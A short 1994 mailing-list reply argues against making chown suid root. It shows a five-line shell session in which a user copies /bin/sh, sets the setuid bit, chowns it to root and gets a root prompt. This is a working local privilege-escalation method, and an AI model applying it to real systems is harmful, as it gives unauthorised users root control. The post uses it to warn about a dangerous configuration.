current-users: Re: chown, quotas and security

Subject: Re: chown, quotas and security
To: Tim Newsham <newsham@zang.kcc.hawaii.edu>
From: David Maxwell <david@spinne.web.net>
List: current-users
Date: 11/06/1994 22:13:50

> you can allow users to chown files by making the chown utility suid
> to root.  When a user-level solution for a site specific option such
> as this is available I say leave the kernel alone.

For most sites this is a bad thing to do...

% cp /bin/sh /tmp/igetroot
% chmod u+s /tmp/igetroot
% /usr/sbin/chown root /tmp/igetroot
% /tmp/igetroot
#

							David Maxwell
							david@spinne.web.net